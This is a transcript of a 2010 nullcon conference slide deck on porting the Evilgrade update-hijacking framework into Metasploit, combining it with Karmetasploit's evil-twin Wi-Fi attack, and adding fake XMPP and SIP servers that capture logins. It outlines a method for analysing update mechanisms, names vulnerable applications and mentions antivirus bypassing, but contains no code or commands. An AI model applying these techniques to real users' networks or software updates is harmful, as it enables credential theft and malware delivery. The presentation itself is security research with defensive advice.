nullcon 2010 - the evil karmetasploit upgrade
DESCRIPTION
nullcon 2010 - The evil karmetasploit upgrade by Veysel OzerTRANSCRIPT
![Page 1: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/1.jpg)
nullcon Goa 2010 http://nullcon.net
Veysel Oezer
The Evil Karmetasploit Upgrade
![Page 2: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/2.jpg)
nullcon Goa 2010 http://nullcon.net
Overview
IntroductionBackgroundTitleRealizationResultsConclusionDemos in between !
![Page 3: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/3.jpg)
nullcon Goa 2010 http://nullcon.net
Introduction
IT SecurityIncreasing attacks
![Page 4: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/4.jpg)
nullcon Goa 2010 http://nullcon.net
Introduction
IT SecurityIncreasing attacks also in Germany
![Page 5: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/5.jpg)
nullcon Goa 2010 http://nullcon.net
Introduction
Know your enemy !”So it is said that if you know your enemies and know yourself, you will fight without danger in battles.
If you only know yourself, but not your opponent, you may win or may lose.
If you know neither yourself nor your enemy, you will always endanger yourself.”
![Page 6: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/6.jpg)
nullcon Goa 2010 http://nullcon.net
Background
The man in the middleThe hacker toolsEvilgradeMetasploitKarma + Karmetasploit
![Page 7: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/7.jpg)
nullcon Goa 2010 http://nullcon.net
The man in the middle attack
![Page 8: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/8.jpg)
nullcon Goa 2010 http://nullcon.net
Known MitM attacks
ARP spoofingDNS spoofingBGP hackingICMP redirect, ...Karma !The evil twin hotspot
![Page 9: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/9.jpg)
nullcon Goa 2010 http://nullcon.net
The hacker tools
Background
![Page 10: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/10.jpg)
nullcon Goa 2010 http://nullcon.net
Evilgrade
Framework for attacking weak update mechanisms”The idea..is the centralization and exploitation of different update impl. all together in one tool”Written in Perl and published 2007-2008Existing ModuleSun JavaApple OS XWinamp, Winzip, Notepad++ and so on.
![Page 11: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/11.jpg)
nullcon Goa 2010 http://nullcon.net
Evilgrade
How does it work
![Page 12: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/12.jpg)
nullcon Goa 2010 http://nullcon.net
Evilgrade
![Page 13: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/13.jpg)
nullcon Goa 2010 http://nullcon.net
Evilgrade
![Page 14: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/14.jpg)
nullcon Goa 2010 http://nullcon.net
Metasploit
Vulnerability development frameworkReduce the work for creating an exploit
Penetration testingSeveral hundert exploits
#5 from top 100 security toolsWritten in Ruby and BSD licensed
"Don't try to teach yourself how to use metasploit under the security camera at the airport"
![Page 15: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/15.jpg)
nullcon Goa 2010 http://nullcon.net
Metasploit architecture
![Page 16: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/16.jpg)
nullcon Goa 2010 http://nullcon.net
Karma
The evil twin access pointMitM attack on WinXp Wireless Zero Configuration...Or just name ”FreeWifi” ;)After MitM, steal authentication dataHttp, Ftp, Pop3, Imap and so on
Released in 2004
![Page 17: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/17.jpg)
nullcon Goa 2010 http://nullcon.net
Karmetasploit
Reimplemantion of Karma into MetasploitFake access point integrated into aircrack-ngAuthentication capturing implemented as auxiliary modules for MetasploitSeveral improvementsBetter hardware supportCookie,Form data stealingBrowser exploitation
![Page 18: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/18.jpg)
nullcon Goa 2010 http://nullcon.net
Goals
Evilgrade 2 MetasploitReimplement functionality as metasploit moduleImprove new system•Port Sharing, Stealth mode, faster metasploit payload generation
Transfer existing evilgrade modules into new system
Create new fake serversSip and XMPP
Find new vulnerabilities in software
![Page 19: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/19.jpg)
nullcon Goa 2010 http://nullcon.net
Fake XMPP
Based on TCPUsed for Jabber → Instant MessagingGoogle Talk...
Has built-in strong security, but depends on server and clientCleartext password transmission possible
![Page 20: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/20.jpg)
nullcon Goa 2010 http://nullcon.net
Fake Sip Server
UDP based protocolRedefined in serveral RFCsAuthentication similar to HTTP DigestChallenge – Response
Try downgrade attack to use Basic Authentication
![Page 21: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/21.jpg)
nullcon Goa 2010 http://nullcon.net
Realisation
EnvironmentsEvilgrade 2 MetasploitAuthentication capturing serversAnalysis of update mechanisms
![Page 22: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/22.jpg)
nullcon Goa 2010 http://nullcon.net
Used tools
WiresharkJacksumVbindiffVmWare WorkstationNetcatGhex
![Page 23: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/23.jpg)
nullcon Goa 2010 http://nullcon.net
Attack Environment
DEMO
![Page 24: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/24.jpg)
nullcon Goa 2010 http://nullcon.net
Realisation E-2-M
![Page 25: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/25.jpg)
nullcon Goa 2010 http://nullcon.net
Fake XMPP
![Page 26: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/26.jpg)
nullcon Goa 2010 http://nullcon.net
Fake Sip Server
![Page 27: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/27.jpg)
nullcon Goa 2010 http://nullcon.net
Analysis
1. Install an old version on the target.
2. Sniff the update process on the attacker.
3. Analyze network communication.
4. If possible, try to simulate the update server.
5. If possible, install latest version on the target.
6. Improve server to be version independent.
7. Improve server to allow to configure options, like the description shown as update information to the client.
![Page 28: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/28.jpg)
nullcon Goa 2010 http://nullcon.net
Results
Fake SIP and XMPP serversReimplementation of EvilgradeAnalysis of update implemenationsNot hackedIndirect hacksHacked
![Page 29: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/29.jpg)
nullcon Goa 2010 http://nullcon.net
Results – fake server
XMPPWorks
SIPDowngrade attack had no successCapturing of Digest Authentication is working
DEMO
![Page 30: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/30.jpg)
nullcon Goa 2010 http://nullcon.net
Results
Evilgrade in MetasploitReimpl. the old functionalityOld modules portedSeveral improvements•All mentioned ones•Anti-virus bypassing for metasploit payloads ( DEMO at the end if time left )
•Some others...
![Page 31: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/31.jpg)
nullcon Goa 2010 http://nullcon.net
Results - Analysis
Not hackeduTorrentAvira Antivir Foxit ReaderVlc uses PGPAd-Aware only one that uses SSLSpybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, Winrar, flashget, camfrog..
![Page 32: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/32.jpg)
nullcon Goa 2010 http://nullcon.net
Results – Not hacked
Not hacked uTorrent uses binary signed data ?!?
![Page 33: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/33.jpg)
nullcon Goa 2010 http://nullcon.net
Results – Not hacked
Not hackedAvira Antivir
MASTER.IDXCRDATE=20090505_1833<3f76d242c16a5491bfe98540f68c36c9>
![Page 34: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/34.jpg)
nullcon Goa 2010 http://nullcon.net
Results – Not hacked
Foxit Reader and the fzip file format
![Page 35: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/35.jpg)
nullcon Goa 2010 http://nullcon.net
Results - Analysis
Indirect hackSkypeQuicktimeOrbit DownloaderMiranda IM
DEMO
![Page 36: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/36.jpg)
nullcon Goa 2010 http://nullcon.net
Results Analysis
HackedTrillianKerio FirewallSuperAntiSpywareFilezillaGomPlayerDivx Player
![Page 37: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/37.jpg)
nullcon Goa 2010 http://nullcon.net
Trillian update mechanism
Binary update informationCan you read that ?
![Page 38: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/38.jpg)
nullcon Goa 2010 http://nullcon.net
Trillian update mechanism
Binary update information
![Page 39: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/39.jpg)
nullcon Goa 2010 http://nullcon.net
Results - Hacked
DEMO
![Page 40: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/40.jpg)
nullcon Goa 2010 http://nullcon.net
Conclusion
Release candidate of evil karmetasploit upgrade is readyNo need for Evilgrade anymoreSeveral improvements compared to EvilgradeNew authentification capturing serversSeveral weak update implementations found,over 100 million downloads from www.cnet.com
![Page 41: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/41.jpg)
nullcon Goa 2010 http://nullcon.net
Conclusion
Feature list for version 2 SIP downgrade attack on old SIP hardwareFake server XMPP over HTTPImprove design to handle Avira Antivir
Feature list of version 3Advanded stealth mode•Intelligent fake DNS server
Find more vulnerabilites
![Page 42: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/42.jpg)
nullcon Goa 2010 http://nullcon.net
Conclusion
Software developersPlease make secure softwareUse standards and deny weak stuff by default
And for the rest of usBe aware of this attack vectorsDo not install every ”important security update”Do not trust security software by defaultDo not trust the Internet, especially (public) Wifi networks
![Page 43: nullcon 2010 - The evil karmetasploit upgrade](https://reader034.vdocuments.mx/reader034/viewer/2022052506/55756ae0d8b42a2e248b4c72/html5/thumbnails/43.jpg)
nullcon Goa 2010 http://nullcon.net
That's it !
Q & A